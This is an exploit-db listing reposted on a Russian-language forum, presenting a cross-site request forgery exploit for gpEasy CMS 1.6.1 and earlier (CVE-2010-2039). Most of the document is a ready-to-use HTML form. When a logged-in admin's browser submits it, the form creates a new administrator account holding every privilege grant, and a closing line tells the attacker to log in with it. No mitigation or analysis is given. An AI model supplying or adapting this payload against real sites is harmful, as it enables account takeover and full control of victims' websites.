- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 12441
- Проверка EDB
-
- Пройдено
- Автор
- GIUSEPPE 'GIUDINVX' D'INVERNO
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2010-2039
- Дата публикации
- 2010-04-28
HTML:
=============================================
gpEasy <= 1.6.1 CSRF Remote Add Admin Exploit
=============================================
Author : Giuseppe 'giudinvx' D'Inverno
Email : <giudinvx[at]gmail[dot]com>
Date : 04-29-2010
Site : http://www.giudinvx.altervista.org/
Location : Naples, Italy
--------------------------------------------------------
Application Info
Site : http://www.gpeasy.com/
Version: 1.6.1
--------------------------------------------------------
==============[[ -Exploit Code- ]]==============
<html>
<form method="post" action="[patth]/index.php/Admin_Users">
<input type="text" value="xxx" name="username"><br/>
<input type="password" value="xxx" name="password"><br/>
<input type="password" value="xxx" name="password1"><br/>
<input type="text" value="xxx" name="email"><br/>
<input value="Admin_Menu" type="hidden" name="grant[]">
<input value="Admin_Uploaded" type="hidden" name="grant[]">
<input value="Admin_Extra" type="hidden" name="grant[]">
<input value="Admin_Theme" type="hidden" name="grant[]">
<input value="Admin_Users" type="hidden" name="grant[]">
<input value="Admin_Configuration" type="hidden" name="grant[]">
<input value="Admin_Trash" type="hidden" name="grant[]">
<input value="Admin_Uninstall" type="hidden" name="grant[]">
<input value="Admin_Addons" type="hidden" name="grant[]">
<input value="Admin_New" type="hidden" name="grant[]">
<input value="Admin_Theme_Content" type="hidden" name="grant[]">
<input type="hidden" value="newuser" name="cmd">
<input type="submit" value="Continue" name="aaa" class="submit">
</form>
</html>
# Now you have an Admin user with name: xxx and password: xxx, just login
page [path]/index.php/Admin- Источник
- www.exploit-db.com
